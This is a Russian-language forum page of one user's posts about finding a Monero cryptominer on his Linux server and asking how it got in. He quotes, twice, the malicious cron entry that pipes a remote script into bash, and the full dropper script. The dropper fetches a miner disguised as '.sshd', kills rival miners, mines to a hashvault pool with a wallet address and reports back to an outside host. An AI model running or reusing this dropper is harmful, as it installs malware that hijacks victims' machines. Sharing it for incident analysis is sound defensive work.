pavelchavyr Сообщения

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Пусто, в том то и дело. Ребята из Чехии, на которых corner ссылку дал, подозревают XMLRPC, у меня оно тоже имеется. Если влезли через него, то это объясняет чистые логи. Буду сейчас веб-сервер ковырять.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Меня смущают чистые логи. Есть инфа о работе скрипта, но нет ничего о проникновении.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Я тоже склоняюсь к версии со слабым паролем. Вот только почему в логах нет записи о входе с левого айпишника?

pavelchavyr	# 4 года, 8 месяцев назад (отредактировано 4 года, 8 месяцев назад)
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Это часть имени пользователя монеро. Дальше в коде можно увидеть его полный логин, в последних двух строчках. `pgrep -f hashvault\|\|./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B\|\|wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"\|\|curl http://lochjol.com/FAIL --user-agent "$(uname -p)"`

pavelchavyr

# 4 года, 8 месяцев назад (отредактировано 4 года, 8 месяцев назад)

Темы: 25

Сообщения: 248

Участник с: 25 января 2011

Это часть имени пользователя монеро. Дальше в коде можно увидеть его полный логин, в последних двух строчках.

pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"||curl http://lochjol.com/FAIL --user-agent "$(uname -p)"

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Это майнер. Скрипт проверяет, запущен он или нет.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Файлы поискал, ничего не нашел. Лог крона говорит, что заражение произошло 8 января.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Да, оно самое. Причем по данным whois домены из скриптика зарегистрированы 9 января 2018 года, так что у меня он тоже недавно.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Вот как раз источник заражения меня и беспокоит, так как не могу его выявить. Подозреваю, что зашли через ssh, может даже просто сбрутфорсили, пароль слабый стоял. Однако в логах никаких записей подозрительных нет.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Нет, но ему привилегий пользователя вполне достаточно.

pavelchavyr	# 4 года, 8 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Заметил необычно высокую загруженность проца, оказалось, что работает в системе майнер. После непродолжительных поисков нашел в кроне такую строчку: 1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null\|bash; Скачивается вот этот файлик x86_64="http://internetresearch.is/sshd" i686="http://internetresearch.is/sshd.i686" touch .test\|\|cd /dev/shm\|\|cd /tmp 2>/dev/null >$MAIL&&chmod 000 $MAIL rm .test 2>/dev/null rm sshd* 2>/dev/null pkill -9 xmrig 2>/dev/null pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8') test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' \| grep -vw $pid \| xargs -r kill -9 pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0 wget --no-check-certificate "$x86_64" -O .sshd\|\|curl -k "$x86_64" -o .sshd wget --no-check-certificate "$i686" -O .sshd.i686\|\|curl -k "$i686" -o .sshd.i686 chmod +x .sshd .sshd.i686 pgrep -f hashvault\|\|./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B\|\|wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"\|\|curl http://lochjol.com/FAIL --user-agent "$(uname -p)" pgrep -f hashvault\|\|./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B\|\|wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -a)"\|\|curl http://lochjol.com/FAIL --user-agent "$(uname -a)" Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?

pavelchavyr

# 4 года, 8 месяцев назад

Темы: 25

Сообщения: 248

Участник с: 25 января 2011

Заметил необычно высокую загруженность проца, оказалось, что работает в системе майнер. После непродолжительных поисков нашел в кроне такую строчку:
1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash;
Скачивается вот этот файлик

x86_64="http://internetresearch.is/sshd"
i686="http://internetresearch.is/sshd.i686"

touch .test||cd /dev/shm||cd /tmp 2>/dev/null
>$MAIL&&chmod 000 $MAIL
rm .test 2>/dev/null
rm sshd* 2>/dev/null
pkill -9 xmrig 2>/dev/null
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
wget --no-check-certificate "$x86_64" -O .sshd||curl -k "$x86_64" -o .sshd
wget --no-check-certificate "$i686" -O .sshd.i686||curl -k "$i686" -o .sshd.i686
chmod +x .sshd .sshd.i686
pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"||curl http://lochjol.com/FAIL --user-agent "$(uname -p)"
pgrep -f hashvault||./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -a)"||curl http://lochjol.com/FAIL --user-agent "$(uname -a)"

Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?